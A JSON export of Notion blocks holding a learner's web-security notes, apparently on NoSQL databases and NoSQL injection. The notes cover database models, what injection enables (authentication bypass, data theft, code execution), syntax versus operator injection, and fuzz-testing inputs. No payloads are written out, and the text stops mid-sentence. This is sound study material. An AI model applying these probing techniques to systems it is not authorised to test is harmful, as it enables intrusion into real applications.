1c:["$","$L1d",null,{"blockContent":[{"object":"block","id":"24fdc9c5-3059-80f3-847a-d87d652c35c3","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-14T22:04:00.000Z","last_edited_time":"2025-08-14T22:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"NoSQL databases","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL databases","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-80a2-8dfb-e56b5478d84a","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"NoSQL databases store and ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL databases store and ","href":null},{"type":"text","text":{"content":"retrieve data in a format other than traditional SQL","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"retrieve data in a format other than traditional SQL","href":null},{"type":"text","text":{"content":" relational tables. ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" relational tables. ","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-803d-905b-e85806de9f41","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:24:00.000Z","last_edited_time":"2025-08-14T22:24:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"They are designed to handle large volumes of ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"They are designed to handle large volumes of ","href":null},{"type":"text","text":{"content":"unstructured","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"unstructured","href":null},{"type":"text","text":{"content":" or ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" or ","href":null},{"type":"text","text":{"content":"semi-structured data","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"semi-structured data","href":null},{"type":"text","text":{"content":". ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":". ","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80a3-9c31-cef28b8cbefe","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:16:00.000Z","last_edited_time":"2025-08-14T22:23:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"They typically have ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"They typically have ","href":null},{"type":"text","text":{"content":"fewer relational constraints and consistency checks","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"fewer relational constraints and consistency checks","href":null},{"type":"text","text":{"content":" than SQL, and claim significant benefits in terms of scalability, flexibility, and performance.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" than SQL, and claim significant benefits in terms of scalability, flexibility, and performance.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80d5-b139-f1a8063c2776","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:23:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Like SQL databases, applications query NoSQL databases to access data. However, NoSQL systems don’t share a single standard language like SQL. ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Like SQL databases, applications query NoSQL databases to access data. However, NoSQL systems don’t share a single standard language like SQL. ","href":null},{"type":"text","text":{"content":"This may be a custom query language or a common language like XML or JSON","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This may be a custom query language or a common language like XML or JSON","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80e5-9edf-f04a82b71e4c","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"24fdc9c5-3059-8080-93c6-ccf3dd8dabae","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:12:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"NoSQL database models","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL database models","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80a1-9873-f44e68b8c1ea","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:18:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"NoSQL databases come in different types, and understanding their structure helps in finding vulnerabilities. ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL databases come in different types, and understanding their structure helps in finding vulnerabilities. ","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-800f-879a-f66e1bb84ed3","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:18:00.000Z","last_edited_time":"2025-08-14T22:18:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Common models include:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Common models include:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8065-b6d9-f3c68a63a929","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Document stores:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Document stores:","href":null},{"type":"text","text":{"content":" Store data in flexible documents (JSON, BSON, XML) and are queried via ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Store data in flexible documents (JSON, BSON, XML) and are queried via ","href":null},{"type":"text","text":{"content":"APIs or query languages","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"APIs or query languages","href":null},{"type":"text","text":{"content":". ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":". ","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-80ff-8679-c7375b8dcf31","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8065-b6d9-f3c68a63a929"},"created_time":"2025-08-14T22:20:00.000Z","last_edited_time":"2025-08-14T22:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Examples: MongoDB, Couchbase.","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Examples: MongoDB, Couchbase.","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"24fdc9c5-3059-801c-9131-e7d7a541bd5a","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Key-value stores:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Key-value stores:","href":null},{"type":"text","text":{"content":" Store data as key–value pairs, retrieving values using ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Store data as key–value pairs, retrieving values using ","href":null},{"type":"text","text":{"content":"unique keys","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"unique keys","href":null},{"type":"text","text":{"content":". ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":". ","href":null},{"type":"text","text":{"content":"Examples: Redis, Amazon DynamoDB.","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Examples: Redis, Amazon DynamoDB.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8000-b2e3-f1b20351a5ee","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Wide-column stores:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Wide-column stores:","href":null},{"type":"text","text":{"content":" Organize related data into column families instead of rows. ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Organize related data into column families instead of rows. ","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-80c9-a65f-d29beaf113e4","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8000-b2e3-f1b20351a5ee"},"created_time":"2025-08-14T22:20:00.000Z","last_edited_time":"2025-08-14T22:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Examples: Apache Cassandra, Apache HBase.","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Examples: Apache Cassandra, Apache HBase.","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"24fdc9c5-3059-808b-a856-f2b61998decc","parent":{"type":"block_id","block_id":"24fdc9c5-3059-80f3-847a-d87d652c35c3"},"created_time":"2025-08-14T22:12:00.000Z","last_edited_time":"2025-08-14T22:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Graph databases:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Graph databases:","href":null},{"type":"text","text":{"content":" Use nodes for data entities and edges for relationships. ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Use nodes for data entities and edges for relationships. ","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-801e-97aa-f3290f77f3b3","parent":{"type":"block_id","block_id":"24fdc9c5-3059-808b-a856-f2b61998decc"},"created_time":"2025-08-14T22:21:00.000Z","last_edited_time":"2025-08-14T22:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Examples: Neo4j, Amazon Neptune.","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Examples: Neo4j, Amazon Neptune.","href":null}],"icon":null,"color":"default"},"archived":false}]}]},{"object":"block","id":"24fdc9c5-3059-807e-9528-e0888e34804c","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-14T22:25:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"NoSQL injection","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL injection","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-800c-9a40-d7e1d89fa215","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:26:00.000Z","last_edited_time":"2025-08-14T22:26:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"NoSQL injection is a vulnerability where attackers manipulate an application’s queries to a NoSQL database. This can let them:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL injection is a vulnerability where attackers manipulate an application’s queries to a NoSQL database. This can let them:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80f8-a98a-fbf5254e22ae","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:26:00.000Z","last_edited_time":"2025-08-14T22:26:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Bypass authentication or security checks","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Bypass authentication or security checks","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8035-b6a4-c7894ba5a3d3","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:26:00.000Z","last_edited_time":"2025-08-14T22:26:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Steal or change data","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Steal or change data","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80c8-94ef-de58b3f8cc24","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:26:00.000Z","last_edited_time":"2025-08-14T22:26:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Disrupt service (DoS)","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Disrupt service (DoS)","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-801b-9a4e-fad380a5bf1a","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:26:00.000Z","last_edited_time":"2025-08-14T22:26:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Run code on the server","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Run code on the server","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8073-8900-c289077065bc","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:26:00.000Z","last_edited_time":"2025-08-14T22:26:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"NoSQL databases differ from SQL databases because they don’t use standard tables or a universal query language and typically have fewer built-in safeguards.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL databases differ from SQL databases because they don’t use standard tables or a universal query language and typically have fewer built-in safeguards.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80a1-b09d-f7230a5ba024","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:27:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"image","image":{"caption":[],"type":"file","file":{"url":"$1e","expiry_time":"2026-05-30T03:39:08.882Z"}},"archived":false},{"object":"block","id":"24fdc9c5-3059-802f-b489-ea7dd0f40879","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:31:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"24fdc9c5-3059-80a2-879d-d7f9b7358375","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:31:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Types of NoSQL injection","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Types of NoSQL injection","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80ca-8a0b-ef8af0012610","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:31:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"There are two different types of NoSQL injection:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"There are two different types of NoSQL injection:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8030-9ec7-c5aa2c33e42f","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:31:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Syntax injection","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Syntax injection","href":null},{"type":"text","text":{"content":" – Happens when you can break the query syntax and insert your own payload. It’s similar to SQL injection but varies because NoSQL databases use different query languages and data structures.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Happens when you can break the query syntax and insert your own payload. It’s similar to SQL injection but varies because NoSQL databases use different query languages and data structures.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-80c4-9658-fd0aa7146bee","parent":{"type":"block_id","block_id":"24fdc9c5-3059-807e-9528-e0888e34804c"},"created_time":"2025-08-14T22:31:00.000Z","last_edited_time":"2025-08-14T22:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Operator injection","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Operator injection","href":null},{"type":"text","text":{"content":" – Happens when you use NoSQL query operators to change how queries behave.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Happens when you use NoSQL query operators to change how queries behave.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"24fdc9c5-3059-8095-bc4a-d0336cd40742","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-14T22:28:00.000Z","last_edited_time":"2025-08-15T18:10:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"NoSQL syntax injection","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL syntax injection","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"24fdc9c5-3059-80fa-9be8-eb1c8a67871b","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-14T22:37:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"You can find NoSQL injection vulnerabilities by trying to break the database query syntax. ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You can find NoSQL injection vulnerabilities by trying to break the database query syntax. ","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-804b-83e9-e27941aa7dd2","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-14T22:37:00.000Z","last_edited_time":"2025-08-14T22:37:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Test each input by sending fuzz strings or special characters to see if the application improperly handles them, which may trigger errors or unusual behavior.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Test each input by sending fuzz strings or special characters to see if the application improperly handles them, which may trigger errors or unusual behavior.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-8001-8ccb-c59c20d6534a","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-14T22:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If you know the database’s API language, use fuzz strings suited for it.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If you know the database’s API language, use fuzz strings suited for it.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"24fdc9c5-3059-804a-8e7b-c325aa2f3290","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-14T22:35:00.000Z","last_edited_time":"2025-08-14T22:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If not, try a variety of fuzz strings to cover multiple query types.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If not, try a variety of fuzz strings to cover multiple query 